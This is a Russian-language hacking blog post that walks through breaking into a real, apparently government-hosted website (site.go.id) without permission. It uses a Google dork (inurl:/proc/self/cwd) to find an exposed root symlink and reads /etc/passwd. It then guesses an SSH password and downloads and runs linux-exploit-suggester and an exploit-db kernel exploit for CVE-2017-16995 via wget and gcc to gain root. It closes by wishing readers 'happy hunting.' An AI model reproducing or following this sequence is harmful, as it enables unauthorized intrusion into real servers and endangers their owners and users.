Hacking
July 5, 2022

Получаем полный доступ к чужому сайту

С помощью Google Dork's и эксплойтов

Всем салют, дорогие друзья!
Для обычного пользователя, Google — это просто поисковая система, используемая для поиска текста, изображений, видео и новостей. Однако, возможности гугла поистине впечатляют, на самом деле найти можно все, что душе угодно, в том числе и уязвимые сайты.

Кстати! Специально для вас мы нашли уязвимый сайт, что бы показать вам все на реальном примере.

Давайте начнем!


Итак, Google Dork, также известный как Google Dorking или Google Hacking, является ценным инструментом для хакера. Он содержит собственный встроенный язык запросов, так называемые "Операторы Google Dork" или, попросту говоря - "Дорки".

Оператор "inurl:" используется для получения результатов, URL-адрес которых содержит только одно ключевое слово, например, inurl: admin

С помощью Google Dork и оператора inurl: /proc/self/cwd нами и был обнаружен уязвимый сайт, который содержал ссылку, ведущую прямо в корневой каталог сервера:

Данная уязвимость заключается в том, что в каталоге сайта содержится символическая ссылка (symlink), которая ведёт в сам корневой каталог (/).


Получение информации о пользователях Linux

Итак, как только мы зашли в корневой каталог сервера, необходимо узнать информацию о пользователях, которые существуют в системе. Они содержатся по пути /etc/passwd и /etc/shadow. Нам нужен файл passwd, так как файл shadow попросту недоступен для обычного пользователя.



Имена обычных пользователей могут начинаться с идентификатора 1000. А вот пользователь kajari - именно тот, кто нам нужен.


Проверка на наличие открытого порта сервиса OpenSSH

Теперь с помощью инструмента Nmap мы просканируем сервер на наличие открытых портов.

  • Открываем терминал и пишем следующую команду:
nmap site.go.id
  • Получаем вывод:
  • Как видим, порт 22 открыт и сервис OpenSSH запущен.
  • Замечательно! Идем дальше...

Вход по SSH

  • Подключимся к серверу по SSH от имени kajari и недолго думая, попытаемся ввести банальный пароль, а именно само имя пользователя (kajari) и-и...
  • Вуаля! Мы вошли!
  • Конечно, это ещё далеко не финал. Предстоит получить получить root доступ.

Так как версия Ubuntu и ядро Linux старые - воспользуемся скриптом "Linux Exploit Suggester" из репозитория GitHub. Он позволяет обнаружить проблемы с безопасностью машины с ядром Linux, а так же предоставляет ссылки на эксплоиты для данных уязвимостей.


Скачивание скрипта и поиск уязвимостей

  • Скачиваем и запускаем скрипт следующими командами:

wget -O search.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh chmod +x search.sh ./search.sh 

Скрипт вывел список с 4-мя уязвимостями. Более вероятная уязвимость — это CVE-2017-16995, именно ею мы и воспользуемся.


Скачивание, компиляция и запуск эксплойта

  • Из информации об уязвимости скачиваем эксплоит по ссылке, которая указана в "Download URL":
wget -O exploit_code.c https://www.exploit-db.com/download/45010
  • С помощью компилятора GCC скомпилируем эксплоит в исполняемый файл:
gcc -o exploit exploit_code.c
  • И запускаем:
chmod +x exploit
./exploit 
  • Итак, дело сделано!

Мы получили root доступ и можем делать с сайтом и сервером все, что душе угодно. Об этом свидетельствует вывод команды whoami и приглашение к вводу (#).

На сегодня это все. Удачной охоты!

👉Да, хочу!ᅠ